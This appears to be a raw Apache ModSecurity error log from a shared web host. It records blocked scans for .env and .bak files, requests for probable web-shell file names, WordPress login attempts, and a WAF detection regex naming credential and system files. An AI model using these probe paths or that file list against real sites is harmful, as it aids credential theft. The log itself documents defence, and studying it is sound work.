[Tue May 26 19:56:49.880497 2026] [security2:error] [pid 93868:tid 94357] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/challenges/.env"] [unique_id "ahWtqUqK9k_ZUB2Vp25e8AAAAfI"]
[Tue May 26 19:56:49.928683 2026] [security2:error] [pid 93576:tid 93661] [remote 38.95.35.74:47280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWtqWDRMqfxdEDkoszfrgAAAVA"]
[Tue May 26 19:56:50.232646 2026] [security2:error] [pid 93868:tid 94281] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.well-known/.env"] [unique_id "ahWtqkqK9k_ZUB2Vp25fAQAAAaY"]
[Tue May 26 19:56:50.554233 2026] [security2:error] [pid 93576:tid 93662] [remote 38.95.35.74:47280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWtqmDRMqfxdEDkoszfuQAAEFE"], referer: https://vcresco.com/wp-login.php
[Tue May 26 19:56:50.948930 2026] [security2:error] [pid 93868:tid 94350] [client 20.9.81.163:36012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahWtqkqK9k_ZUB2Vp25fJQAAAes"]
[Tue May 26 19:56:50.949014 2026] [security2:error] [pid 93868:tid 94350] [client 20.9.81.163:36012] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahWtqkqK9k_ZUB2Vp25fJQAAAes"]
[Tue May 26 19:56:51.115661 2026] [security2:error] [pid 93868:tid 94337] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/search.php.bak"] [unique_id "ahWtq0qK9k_ZUB2Vp25fLQAAAd4"]
[Tue May 26 19:56:51.824771 2026] [security2:error] [pid 93868:tid 94264] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/chat-app/.env"] [unique_id "ahWtq0qK9k_ZUB2Vp25fUAAAAZU"]
[Tue May 26 19:56:52.000451 2026] [security2:error] [pid 93868:tid 94302] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/booking-app/api/.env"] [unique_id "ahWtq0qK9k_ZUB2Vp25fVwAAAbs"]
[Tue May 26 19:56:52.083098 2026] [security2:error] [pid 93868:tid 94277] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtq0qK9k_ZUB2Vp25fSAAAAaI"]
[Tue May 26 19:56:52.175899 2026] [security2:error] [pid 93868:tid 94344] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/owncloud/.env"] [unique_id "ahWtrEqK9k_ZUB2Vp25fXQAAAeU"]
[Tue May 26 19:56:53.628583 2026] [security2:error] [pid 93576:tid 93734] [client 20.9.81.163:36736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahWtrWDRMqfxdEDkoszf5AAAABY"]
[Tue May 26 19:56:53.628727 2026] [security2:error] [pid 93576:tid 93734] [client 20.9.81.163:36736] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahWtrWDRMqfxdEDkoszf5AAAABY"]
[Tue May 26 19:56:53.771052 2026] [security2:error] [pid 93868:tid 94366] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/web/.env"] [unique_id "ahWtrUqK9k_ZUB2Vp25flwAAAfs"]
[Tue May 26 19:56:53.925243 2026] [core:crit] [pid 93868:tid 94309] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:56:54.092355 2026] [security2:error] [pid 93868:tid 94302] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtrUqK9k_ZUB2Vp25flgAAAbs"]
[Tue May 26 19:56:54.653056 2026] [security2:error] [pid 93868:tid 94201] [remote 162.241.152.21:58928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWtrkqK9k_ZUB2Vp25ftwAB_F8"]
[Tue May 26 19:56:54.969693 2026] [security2:error] [pid 93868:tid 94330] [client 20.9.81.163:37268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWtrkqK9k_ZUB2Vp25fzgAAAdc"]
[Tue May 26 19:56:54.969812 2026] [security2:error] [pid 93868:tid 94330] [client 20.9.81.163:37268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWtrkqK9k_ZUB2Vp25fzgAAAdc"]
[Tue May 26 19:56:55.130546 2026] [security2:error] [pid 93868:tid 94340] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/teams/.env"] [unique_id "ahWtr0qK9k_ZUB2Vp25f2gAAAeE"]
[Tue May 26 19:56:55.332376 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ms-edit.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25f4gAAAaI"]
[Tue May 26 19:56:55.332539 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ms-edit.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25f4gAAAaI"]
[Tue May 26 19:56:55.403361 2026] [security2:error] [pid 93868:tid 94193] [remote 162.241.152.21:58928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25f4wABz1s"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 19:56:55.625519 2026] [security2:error] [pid 93868:tid 94362] [client 20.9.81.163:36359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/simple.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25f7gAAAfc"]
[Tue May 26 19:56:55.625609 2026] [security2:error] [pid 93868:tid 94362] [client 20.9.81.163:36359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/simple.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25f7gAAAfc"]
[Tue May 26 19:56:55.753319 2026] [security2:error] [pid 93576:tid 93717] [client 20.9.81.163:36352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWtr2DRMqfxdEDkoszf-QAAAAU"]
[Tue May 26 19:56:55.753421 2026] [security2:error] [pid 93576:tid 93717] [client 20.9.81.163:36352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWtr2DRMqfxdEDkoszf-QAAAAU"]
[Tue May 26 19:56:55.983948 2026] [security2:error] [pid 93868:tid 94283] [client 20.9.81.163:35661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/404.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25gAwAAAag"]
[Tue May 26 19:56:55.984036 2026] [security2:error] [pid 93868:tid 94283] [client 20.9.81.163:35661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/404.php"] [unique_id "ahWtr0qK9k_ZUB2Vp25gAwAAAag"]
[Tue May 26 19:56:56.113129 2026] [security2:error] [pid 93868:tid 94343] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.conf.bak"] [unique_id "ahWtsEqK9k_ZUB2Vp25gBgAAAeQ"]
[Tue May 26 19:56:56.165103 2026] [security2:error] [pid 93576:tid 93790] [client 20.9.81.163:36011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/file3.php"] [unique_id "ahWtsGDRMqfxdEDkoszf_QAAAE4"]
[Tue May 26 19:56:56.165197 2026] [security2:error] [pid 93576:tid 93790] [client 20.9.81.163:36011] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/file3.php"] [unique_id "ahWtsGDRMqfxdEDkoszf_QAAAE4"]
[Tue May 26 19:56:56.227376 2026] [security2:error] [pid 93868:tid 94005] [remote 194.213.4.139:39618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gBQABmQY"]
[Tue May 26 19:56:56.386795 2026] [security2:error] [pid 93868:tid 94364] [client 20.9.81.163:37205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gFgAAAfk"]
[Tue May 26 19:56:56.386897 2026] [security2:error] [pid 93868:tid 94364] [client 20.9.81.163:37205] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gFgAAAfk"]
[Tue May 26 19:56:56.539986 2026] [security2:error] [pid 93868:tid 94345] [client 20.9.81.163:37224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gHwAAAeY"]
[Tue May 26 19:56:56.540090 2026] [security2:error] [pid 93868:tid 94345] [client 20.9.81.163:37224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gHwAAAeY"]
[Tue May 26 19:56:56.828784 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gLAAAAaI"]
[Tue May 26 19:56:56.828909 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36408] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gLAAAAaI"]
[Tue May 26 19:56:56.992576 2026] [security2:error] [pid 93868:tid 94366] [client 20.9.81.163:37227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/.dj/index.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gMwAAAfs"]
[Tue May 26 19:56:56.992669 2026] [security2:error] [pid 93868:tid 94366] [client 20.9.81.163:37227] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/.dj/index.php"] [unique_id "ahWtsEqK9k_ZUB2Vp25gMwAAAfs"]
[Tue May 26 19:56:57.280953 2026] [security2:error] [pid 93868:tid 94374] [client 20.9.81.163:35656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahWtsUqK9k_ZUB2Vp25gQgAAAgM"]
[Tue May 26 19:56:57.281064 2026] [security2:error] [pid 93868:tid 94374] [client 20.9.81.163:35656] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahWtsUqK9k_ZUB2Vp25gQgAAAgM"]
[Tue May 26 19:56:57.421660 2026] [security2:error] [pid 93868:tid 94293] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.json.bak"] [unique_id "ahWtsUqK9k_ZUB2Vp25gRQAAAbI"]
[Tue May 26 19:56:57.471067 2026] [security2:error] [pid 93576:tid 93820] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtsWDRMqfxdEDkoszgCAAAAGw"]
[Tue May 26 19:56:57.573224 2026] [security2:error] [pid 93576:tid 93800] [client 20.9.81.163:35978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahWtsWDRMqfxdEDkoszgFAAAAFg"]
[Tue May 26 19:56:57.573315 2026] [security2:error] [pid 93576:tid 93800] [client 20.9.81.163:35978] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahWtsWDRMqfxdEDkoszgFAAAAFg"]
[Tue May 26 19:56:57.897632 2026] [security2:error] [pid 93868:tid 94306] [client 20.9.81.163:36068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahWtsUqK9k_ZUB2Vp25gWgAAAb8"]
[Tue May 26 19:56:57.897759 2026] [security2:error] [pid 93868:tid 94306] [client 20.9.81.163:36068] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahWtsUqK9k_ZUB2Vp25gWgAAAb8"]
[Tue May 26 19:56:57.917621 2026] [security2:error] [pid 93868:tid 94240] [remote 194.213.4.139:39618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtsUqK9k_ZUB2Vp25gXAABuXQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:58.360339 2026] [security2:error] [pid 93576:tid 93787] [client 20.9.81.163:36095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahWtsmDRMqfxdEDkoszgHAAAAEs"]
[Tue May 26 19:56:58.360456 2026] [security2:error] [pid 93576:tid 93787] [client 20.9.81.163:36095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahWtsmDRMqfxdEDkoszgHAAAAEs"]
[Tue May 26 19:56:58.404030 2026] [security2:error] [pid 93868:tid 94304] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/footer.php.bak"] [unique_id "ahWtskqK9k_ZUB2Vp25gbwAAAb0"]
[Tue May 26 19:56:58.566145 2026] [security2:error] [pid 93868:tid 94279] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-includes/.env"] [unique_id "ahWtskqK9k_ZUB2Vp25gdwAAAaQ"]
[Tue May 26 19:56:58.670043 2026] [security2:error] [pid 93576:tid 93785] [client 20.9.81.163:35982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahWtsmDRMqfxdEDkoszgJwAAAEk"]
